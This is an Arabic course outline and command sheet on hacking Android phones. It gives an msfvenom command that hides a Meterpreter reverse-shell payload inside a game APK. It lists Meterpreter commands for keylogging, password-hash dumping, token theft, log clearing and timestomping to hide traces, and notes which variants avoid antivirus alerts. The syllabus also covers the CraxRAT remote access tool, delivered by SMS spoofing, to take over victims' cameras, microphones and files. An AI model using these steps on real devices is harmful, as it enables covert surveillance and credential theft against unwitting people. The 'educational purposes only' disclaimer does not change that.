
أمر تنزيل أداة apksigner
sudo apt-get install apksigner
أمر تنزيل أداة zipalign
sudo apt-get install zipalign
أمر إنشاء البايلود
msfvenom -x snake.apk -p android/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -o name.apk
بحيث:
-x يشير دمج تطبيق من اختبارك ، وفي حالتنا اختبرنا تطبيق لعبة الدودة
-p هو البايلود المستخدم وقد اخترنا اندرويد لأننا سنخترق الأندرويد مع جلسى تنصت ميتربريتر تيسيبي
LHOST هو الايبي الداحلي او الخارجي،
وفي حالتنا استخدمنا هوست خاص بموقع playit
LPORT هو البورت الخاص بالتوجيه
-o تختار مكان واسم حفظ البايلود
قائمة لأوامر Meterpreter
الخطوة 1: الأوامر الأساسية
في أبسط استخداماتها، يعد Meterpreter محطة طرفية لنظام Linux على جهاز الضحية. على هذا النحو، يمكن استخدام العديد من أوامر Linux الأساسية على Meterpreter حتى لو كان على نظام تشغيل Windows أو نظام آخر.
إليك بعض الأوامر الأساسية التي يمكننا استخدامها على Meterpreter.
· ? - help menu
· background - moves the current session to the background
· bgkill - kills a background meterpreter script
· bglist - provides a list of all running background scripts
· bgrun - runs a script as a background thread
· channel - displays active channels
· close - closes a channel
· exit - terminates a meterpreter session
· help - help menu
· interact - interacts with a channel
· irb - go into Ruby scripting mode
· migrate - moves the active process to a designated PID
· quit - terminates the meterpreter session
· read - reads the data from a channel
· run - executes the meterpreter script designated after it
· use - loads a meterpreter extension
· write - writes data to a channel
الخطوة 2: أوامر نظام الملفات
تتيح لك هذه الأوامر التفاعل مع ملفات النظام الموجودة على جهاز الضحية. يمكنك استعراض الملفات، رفع وتنزيل الملفات، وحتى تنفيذ أوامر النظام.
· cat - read and output to stdout the contents of a file
· cd - change directory on the victim
· del - delete a file on the victim
· download - download a file from the victim system to the attacker system
· edit - edit a file with vim
· getlwd - print the local directory
· getwd - print working directory
· lcd - change local directory
· lpwd - print local directory
· ls - list files in current directory
· mkdir - make a directory on the victim system
· pwd - print working directory
· rm - delete a file
· rmdir - remove directory on the victim system
· upload - upload a file from the attacker system to the victim
الخطوة 3: أوامر الشبكات
تتيح لك أوامر الشبكات في Meterpreter التفاعل مع الشبكات المحلية والخارجية التي يتصل بها جهاز الضحية. هذه الأوامر مفيدة لاستكشاف الشبكات ومعرفة المزيد عن الاتصال الحالي. إليك بعض الأوامر الأساسية في هذا السياق:
· ipconfig - displays network interfaces with key information including IP address, etc.
· portfwd - forwards a port on the victim system to a remote service
· route - view or modify the victim routing table
الخطوة 4: أوامر النظام
تتيح لك أوامر النظام في Meterpreter تنفيذ مجموعة متنوعة من الأوامر لإدارة والتحكم في جهاز الضحية. إليك بعض الأوامر الأساسية:
· clearav - clears the event logs on the victim's computer
· drop_token - drops a stolen token
· execute - executes a command
· getpid - gets the current process ID (PID)
· getprivs - gets as many privileges as possible
· getuid - get the user that the server is running as
· kill - terminate the process designated by the PID
· ps - list running processes
· reboot - reboots the victim computer
· reg - interact with the victim's registry
· rev2self - calls RevertToSelf() on the victim machine
· shell - opens a command shell on the victim machine
· shutdown - shuts down the victim's computer
· steal_token - attempts to steal the token of a specified (PID) process
· sysinfo - gets the details about the victim computer such as OS and name
الخطوة 5: أوامر واجهة المستخدم
تتيح لك أوامر واجهة المستخدم في Meterpreter التفاعل مع سطح المكتب وجلسات المستخدم على جهاز الضحية. هذه الأوامر يمكن أن تكون مفيدة لمراقبة النشاطات أو التفاعل المباشر مع الجلسات. إليك بعض الأوامر الأساسية:
· enumdesktops - lists all accessible desktops
· getdesktop - get the current meterpreter desktop
· idletime - checks to see how long since the victim system has been idle
· keyscan_dump - dumps the contents of the software keylogger
· keyscan_start - starts the software keylogger when associated with a process such as Word or browser
· keyscan_stop - stops the software keylogger
· screenshot - grabs a screenshot of the meterpreter desktop
· set_desktop - changes the meterpreter desktop
· uictl - enables control of some of the user interface components
الخطوة 6: أوامر تصعيد الامتيازات
تتيح لك أوامر تصعيد الامتيازات في Meterpreter الحصول على صلاحيات أعلى على جهاز الضحية، مما يتيح لك الوصول إلى وظائف وبيانات محمية. إليك بعض الأوامر الأساسية:
· getsystem - uses 15 built-in methods to gain sysadmin privileges
الخطوة 7: أوامر تفريغ كلمات المرور
تتيح لك أوامر تفريغ كلمات المرور في Meterpreter الحصول على كلمات المرور المخزنة على جهاز الضحية، مما يساعدك في الوصول إلى حسابات مستخدمين أخرى أو أنظمة مختلفة. إليك بعض الأوامر الأساسية:
· hashdump - grabs the hashes in the password (SAM) file
لاحظ أن أمر hashdump غالباً ما يقوم بتنبيه برامج مكافحة الفيروسات (AV)، ولكن يوجد الآن نصان أكثر تسللًا هما "run hashdump" و"run smart_hashdump".
الخطوة 8: أوامر تلاعب الطوابع الزمنية (Timestomp)
تتيح لك أوامر تلاعب الطوابع الزمنية في Meterpreter تغيير الطوابع الزمنية للملفات والمجلدات على جهاز الضحية. هذا يمكن أن يكون مفيدًا لإخفاء آثارك على النظام. إليك بعض الأوامر الأساسية:
timestomp [file] -m [MM/DD/YYYY] - تعديل تاريخ التعديل.
timestomp [file] -a [MM/DD/YYYY] - تعديل تاريخ الوصول.
timestomp [file] -b [MM/DD/YYYY] - تعديل تاريخ الإنشاء (البداية).
timestomp [file] -e [MM/DD/YYYY] - تعديل تاريخ آخر تنفيذ.
timestomp [file] -f [times] - تعديل جميع الطوابع الزمنية للمطابقة.
timestomp [file] -z [offset] - إضافة أو طرح عدد معين من الثواني من جميع الطوابع الزمنية.
السلام عليكم ورحمة الله وبركاته، مرحبًا بكم في الكورس حول الاختراق الأخلاقي لأجهزة الأندرويد.
تهدف هذه الدورة إلى تعريفكم بمفهوم الاختراق الأخلاقي، وتزويدكم بالمعرفة والمهارات الأساسية التي يحتاجها المخترق الأخلاقي لاستخدام أساليب مختلفة.
في نهاية هذه الدورة، ستكون قادرًا على إختراق أجهزة الأندرويد بطرق مختلفة.
ويجب التنوية هنا أن هذا الكورس مُعد فقط للأغراض التعليمية و توضيح كافة الطرق التى يستخدمها الهاكرز في اختراق خصوصيتنا بغرض الحماية ضد الهجمات المختلفة، وفيما يلي سرد لجوانب الكورس:
الجزء الأول :
مقدمة عن الكورس
الجزء الثاني -تثبيت نظام كالي لينكس ووندوز على النظام الوهمي- :
بحيث ستتعلم طريقة تثبيت نظام كالي لينكس الخاص بالإختراق ومعرفة أهم الأوامر الأساسية الخاصة بالترمنال، وأيضا تثبيت نظام ويندوز على النظام الوهمي كخطوة أساسية للحماية.
- تحميل برنامج VMware workstation
- تثبيت نظام الويندوز على VMware workstation
- تثبيت نظام كالي لينكس على VMware workstation
- ترقية نظام كالي لينكس
الجزء الثالث -كيفية إختراق هواتف الأندرويد باستعمال Metasploit في نظام كالي لينكس- :
ستتعلم ماهو مشروع Metasploit، وكيف نستطيع الإختراق به أي جهاز أو موقع.
- التسجيل في موقع playit للحصول على بورت وهوست لاختراق خارجي مع حل مشاكل التبليغ
- تثبيت أداة apktool من أجل خاصية دمج البايلود بتطبيق آخر
- تتثبيت المتطلبات الأخرى لحقن البايلود وحل المشاكل المتوقعة الحدوث
- إنشاء بايلود محقون بتطبيق لعبة، و إختراق الجهاز والتحكم به عن بعد
الجزء الرابع -كيفية إختراق هواتف الأندرويد باستعمال Craxrat في نظام ويندوز- :
ستتعرف على برنامج الرات ألا وهو Craxrat و كيفية إختراق هواتف الأندرويد به
-تحميل برنامج Craxrart 7.4 وتثبيت متطلبات تشغيله
-الدخول لبرنامج Craxrat وشرح واجهته
-التسجيل في موقع playit للحصول على بورت وهوست لاختراق خارجي مع حل مشاكل التبليغ
-عمل بايلود ودمجه بتطبيق آخر وارساله لبدأ عملية الإختراق
-إختراق الأندرويد واستخراج جميع ملفاته وفتح الكاميرا والمايك الخاص به ورؤية شاشته
- إرسال تطبيق كراكسرت للضحية عبر سرفر apache وباستخدام Ngrok مع خاصية Sms Spoofing
الجزء الخامس :
خاتمة
ملاحظة هامة:
- الكورس مُعد للأغراض التعليمية فقط !
- الكورس هو حق محفوظ لدى المحاضر وغير مسموح لأي شخص لإعادة إستخدامه
- الهجمات التى تم تنفيذها فى الكورس على جهاز حقيقة
- ان وُجدت أي أسئلة فقط اعرض سؤالك في قسم الأسئلة والأجوبة وسنرد عليك في أسرع وقت ممكن.
السلام عليكم، ووفقكم الله و سدد خطاكم.